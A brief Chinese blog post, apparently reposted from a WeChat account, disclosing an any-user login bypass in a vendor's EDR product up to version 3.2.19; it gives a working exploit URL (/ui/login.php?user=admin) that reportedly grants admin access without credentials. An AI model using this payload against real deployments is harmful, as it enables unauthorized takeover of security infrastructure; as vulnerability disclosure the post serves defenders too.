xx服EDR任意用户登录

用户8478399

发布于 2022-09-01 15:25:13

4250

发布于 2022-09-01 15:25:13

文章被收录于专栏：White OWL

暂无

某某服EDR任意用户登录漏洞

EDR<= v3.2.19

攻击者可以通过构造payload绕过登录判断

/ui/login.php?user=admin

找到一个

浏览器直接输入

url输入payload 成功进入

http://ip/ui/login.php?user=admin (大概是这样的)

可以看到直接进来了

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2020-08-21，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 White OWL 微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度